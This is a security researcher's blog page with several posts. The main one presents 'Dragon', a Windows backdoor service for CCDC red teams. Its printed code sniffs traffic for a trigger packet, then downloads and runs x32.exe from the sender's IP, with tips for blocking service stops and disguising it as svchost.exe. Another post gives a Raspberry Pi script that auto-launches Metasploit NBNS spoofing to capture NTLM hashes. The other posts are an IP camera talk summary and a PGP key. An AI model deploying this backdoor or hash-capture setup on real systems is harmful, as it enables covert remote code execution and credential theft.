Thursday, January 16, 2014

Dragon a windows, non-binding, passive download/exec backdoor.

In the many years of participating in CCDC I keep running into the same problem.  If you've red teamed for one of these events, I'm sure you've encountered the same.  You've gotten a shell on a system, you've even installed a backdoor either through a bind listener, or through a reverse connection that calls back periodically. However, the savvy blue teams, either through firewall new rules killed your connection, or via netstat identified your back door and killed the process.

I've grown so frustrated with loosing my shells I decided to write (okay mostly steal and modify) a new backdoor specifically for windows.  I noticed that since the teams are scored for having their services up and running, they will never (in their right mind) firewall off access to the service running on their windows servers.   However, since the victims system would be running their service on that non-firewalled port, I couldn't just bind my listener to that same service.

So, instead of binding a socket to that interface/port, what if we set the interface to promiscuous mode, and listened to all the traffic on the machine.  We could then monitor for a specific trigger on all of the passing traffic and if one of those packets happen to match our rule set, we could run our back door code.

For this I wrote an app called dragon. Dragon, is a windows app that is designed to be installed as a windows service and will run at windows boot. It will listen to the first interface available to the OS (note, if you have multiple interfaces, this will only pick the first one to listen too).  It will continuously listen to all traffic across this interface, and discard ALL packets its uninterested in.

If a packet comes in with the Source Port of 12317, it will execute the following:
if (sport == 12317) { //Change this if you want it to listen on a different port.      
      remove( "c:\\windows\\system32\\x32.exe" );
      char cmd[255];        
      sprintf(cmd, "\"c:\\windows\\system\\wget.exe http://%d.%d.%d.%d/x32.exe\"", ih->saddr.byte1, ih->saddr.byte2, ih->saddr.byte3, ih->saddr.byte4 );
      system(cmd);
      system("c:\\windows\\system32\\x32.exe");
}

First it will remove any file stored under c:\windows\system32\ called x32.exe.  Next using wget.exe (you'll need to install this on your own).  It will download x32.exe from a host where the magic happy packet was sent from.  This means that even if the blue team firewalls off your attacking server, just change your IP, and send your happy magic packet from your new IP. It'll still work.  Lastly it'll execute it.  Note that we are using system() to call our binary.  Doing this means that the service will wait until the execution of x32.exe has finished before listening again for more happy packets.  I didn't want to fill taskmgr with a string of x32.exe's.  Lastly, I chose the name of the exe and source port as a preference, if you like to use something else just modify it in this function, the rest of the code can remain untouched. Heck you could put what ever you wanted here, shellcode to be executed, windows commands like add users to local adminstrators, etc. Its pretty modular, I just wanted the ability to down/exec when needed.

Other things to note.  This windows service employs the following code:
   ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_SHUTDOWN;
The ServiceStatus.dwControlsAccepted is the value which tells the service, what states it'll accept from the user.  Right now its set to only accept termination when being told that the system is shutting down.  This means the user can not pause or start the service, even if they are Administrator  The only way to kill/stop it is using task manager and kill the procces.  To help blend in even further I recommend you rename dragon.exe to svchost.exe :).

Other Items:

  1. This runs at a layer that is lower than the host firewall.  I haven't noticed many teams using host based firewalls, but even if they did, it wouldn't block this.
  2. This exe does require that libpcap driver be installed on the victims machine.  A reboot is NOT needed for this, but a silent install of winpcap is recommended.  I tried doing manual installs and it became a pain with 64 bit systems.  Instead the wonderful people over at nmap.org released a winpcap installer that has a silent switch:  winpcap.exe /S.  Pretty simple.
  3. This code will compile (use  MinGW) for both 32bit and 64bit executibles.  I have successfully run this backdoor on:
    1. Windows XP 32 bit
    2. Windows 7 32 bit
    3. Windows 7 64 bit
    4. Windows 8 64 bit
    5. Windows 2000 server 32 bit (for fun)
    6. Windows 2003 server 32 bit
    7. Windows 2012 Server 64 bit
  4. It does not work for IPv6 networks because...ew.

That should be about it.  If you're interested, take a look, the code is up on github. Major props to by fx@phenoelit.de (for cd00r.c) and drizzt@drizzt.it (for helldoor.c).  Lastly if you have any questions or comments, leave them below or you can reach me on @jarsnah12 on twitter.

~int128
Oh and if you're looking for something similar but for *nix, take a look at knockd.

Thursday, April 11, 2013

Confessions of an IP Camera

A past weekend in early April 2013, a fellow #madsec individual (meatball) and I gave a talk at BSides Iowa regarding security weaknesses found in IP Cameras.  The talk focused around various IP camera vendors which put consumers at risk of exposing these cameras publicly via dynamic DNS and UPnP features. 

Our research revealed that not only could an attacker easily identify where these cameras exist and access video and audio streams of unsuspecting users, but often times, collect wifi keys, e-mail, FTP and MSN credentials by simply issuing a .cgi GET request.  Using geo-IP information and Wifi MAC address triangulation, we can pinpoint where these cameras are located to the city block.

We also were made aware that individuals at Qualys presented a similar talk at Hack-in-the-Box on the same weekend as our presentation.  We hope to chat with those individuals about our research plans moving forward. The directory traversal vulnerability in their research looks pretty cool, something we wish we had more time to look at. You can view their research here.

Our intentions are to raise awareness of the practices of these camera vendors as well as create a framework for collecting and organizing this data, as example by the below map demonstrating the ease in which an attacker could gather this publicly available information.  We encourage you to check our presentation out below.



Presentation:  Confessions of an IP Camera  [PDF] 


Update:  (August 14, 2013)
In August 2013, CNN caught wind of these security flaws in IP Cameras and hosted David Kennedy for an video segment which can be viewed below:


Saturday, February 9, 2013

RaspberryPi WPAD AutoPwn

Like many of the people I know who were interested in getting their hands on the RaspberryPi, once I acquired  a couple of these devices, I was struggling to find a good use for the miniature Linux computer. 


As a penetration tester, one attack I enjoy performing is attempting to take advantage of the Netbios Name Service, particularly responding to broadcasts for WPAD.  For those not familiar with the concept, Tim Medin has a terrific post at Packetstan which I highly suggest reading.  This attack is highly effective when engagement scoping excludes arp poisoning and other traffic manipulations.

My objective was to accomplish the attacks mentioned in the post above in an automated fashion using these drop-box style mini-computers.  I'll demonstrate my methodology of turning this little Linux computer into an automatic hash collector simply by turning on and plugging into a network.

First off, many distributions for the RaspberryPi exist, and it just so happens that my distribution of choice was Raspbian.  Another terrific option would be RaspberryPwn, a Raspberry Pi pentesting suite by the guys at Pwnie Express.

Once you have your distribution of choice up and running, a few things will need to be fetched and compiled on the Pi.  I would recommend Screen to serve as a terminal and window manager, however a graphical-X display can be run if one chooses.

For my Rasbian distrubution, the below got me setup with Ruby the latest Metasploit framework.  I elected for the source as I was working on the ARM architecture. 
  
mkdir /pentest
mkdir /pentest/wpad_pwner
apt-get install ruby
cd /pentest
wget http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
bunzip framework-latest.tar.bz2
tar -xvf framework-latest.tar

Inside the /pentest/wpad_pwner directory, I created a simple text file and a simple bash script.  The text file serves as a template for which the future resource file will  be created.  The bash script determines any IP assigned to the RaspberryPi and creates the needed Metasploit resource file.  Lastly, the bash script then executes Metasploit and setups our handlers.

File:  /pentest/wpad_pwner/WPAD_NBNS_RESPONSE_INT_UNDEF
use auxiliary/spoof/nbns/nbns_response
set spoofip INTERFACE
run
use auxiliary/server/capture/smb
set JOHNPWFILE /pentest/wpad_pwner/johnsmb
run
use auxiliary/server/capture/http_ntlm
set LOGFILE /pentest/wpad_pwner/httplog
set URIPATH /
set SRVPORT 80
run
File:  /pentest/wpad_pwner/nbns_autopwn.sh
#!/bin/bash
rm /pentest/wpad_pwner/WPAD_NBNS_RESPONSE.rc
dhclient eth0
LISTENIP=$(ifconfig eth0 | grep "inet addr" | awk -F: '{print $2}' | awk '{print $1}')
cp WPAD_NBNS_RESPONSE_INT_UNDEF WPAD_NBNS_RESPONSE.rc
sed -i 's/INTERFACE/'$LISTENIP'/g' WPAD_NBNS_RESPONSE.rc
/pentest/msf3/msfconsole -r WPAD_NBNS_RESPONSE.rc
Once the files are created, don't forget to make the bash script executable.  If you would like for the script to execute at boot (allowing for plug and gather hash automation), simply echo to the rc.local file. 
chmod +x /pentest/wpad_pwner/nbns_autopwn.sh
echo "./pentest/wpad_pwner/nbns_autopwn.sh" >> /etc/rc.local
Note, that for Metaploit's auxiliary/server/capture/http_ntlm to bind to TCP port 80, the script will require root privileges.  Also, the Metasploit console load time on the RaspberryPi can take upwards of 5 to 10 minutes, have some patience.


On a simplistic level, the above should capture various Netbios queries and reply, and in certain instances such as queries for WPAD, result in collected hashes.  If one is new to these types of Netbios Name spoofing attacks, I would again refer you to read Tim Medin's Packetstan blog for a deep dive into the attack. With the addition of a automated reverse shell to a controlled server, collected hashes can be gathered on the fly and replayed in pass-the-hash style attacks or cracked depending upon the type of hash received (LM, NTLMv1 or NTLMv2).

Friday, July 8, 2011

Travis Kaun PGP Public Key

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.11 (GNU/Linux)

mQINBFIFDR4BEAC6wOUZRckAK9SMJ9cXWw0fNRw+nAjkiHuooGpVMT7/xJl37dtD
5gvvW3JpUYtzA+PSbdCJRsACBwnr2eCcG9+oUc4TR5Kkc+xuIt4x6Qr1s+Y52KyD
pWT9BNVe9/0AS+ZRax2eXwggiQTOjlVMxZr35o4gUBsG40soU3hWx3+xhzZTnlBD
zCa02LzuiTaQs/F2kBI45tutXKxLJ7B5L96ok4c2J0jrjULUT6TvPgsDy7xVTobc
chBdW4UE1cY6jUaka7NgWkqGLmmEhm7jW5iQzlvrL2e/cyw4XyQwXRuenuVEYHKw
ONjGKWoU4j8nr94xM0iy935n482hXtyt2vbumHJWjY4SF1sosQgwRUVPUsuCMseV
A10jDPusZIByyqqE7tGQwdkqliZBUWkQaD4V3qlpgq1yW5lUxA54BE4TUH5VBlD2
vDaqBdt9Q1/1u+ox8vc1Ah2+zBawiZAM9pGRw/qumtlbwJJa9P0vZ/pZy7WRrhT3
/EWHA8ktbQnTxmYqyhPtzwbrMjv5rMLwIU7gCYiXE4nrqkc2mmayi5pJHOXQjspp
rrmmZNYMpGr9jFNJTbeu85+ko0auwH3DjPJe67O0PjPQpKN/s8IKKYuMbu2koAxC
C/sTPG/LOm2zSmOAgaVundpD0xH74Ra9VBGkuMa4FCZwBU8mJ0pqtdvCKQARAQAB
tCJUcmF2aXMgS2F1biA8dHJhdmlza2F1bkBnbWFpbC5jb20+iQIcBBABCAAQBQJS
BQ2tCRBDei4dg9xCuAAAS6YQAJrcPYTVAUrEx6PVNN6FzRBH6m8HYcH2fhjAdm8k
2TTNypEOt5op0g6RpO+nD7+H4W09UT7/1pZcxGH7Uk6nm2Sn6GYMEHtyR09zB1tP
WfCDs0mCwrAjf+z82jMKA9CscRSTngNlQOKgfOUIGFPdmndnkG4tX3vRJbuvInLf
f8mCrKd9sdpSN/tm5zYqYvCQIVD2uRphpNBRyuvnHD2G+m7Tv1O+xM7sIQjfGaK5
fVZKunUInfuhj3pJ+RxJVx5dvH4sb0YIw8X2X6a5Sv1woVdAiSIFOCdiKTepvJkR
/D8oNPDDkc2ItTB6fQukjn8yIMs3/D9TP8zccd8OO2ZSB1Hm4CQQZP3LaPOLA3A8
/EoS/UDmdDVP7Q1QewSgRawzpTDLIpZRV6+GTLV//PjAXuXnyVioy6iCmEkn7IS7
n0HU2E7+8LauHJg2//V/Fm3t7dYfmC/yB9BuLaNmsTS5Q/RoskGiMT5Ph+EGIoF6
e8g4n1knrc6IEJ9NBAaRT7gLkqV+95POGx8AatmarYqo2uyiCr7gTvpSPJMh6GSQ
O2+P9heKBFdsrzyX0BmKBasviEi6k5cuVfuEco5wDscqoLTPaV9AswWfcGUHhCie
Vyh0bUm4htuM9miE+JFrCnLBPEwUIEC4YFx8F/5HsCG3btyqPGHSFsZLYiysWfDa
CUqK
=ui0W

-----END PGP PUBLIC KEY BLOCK-----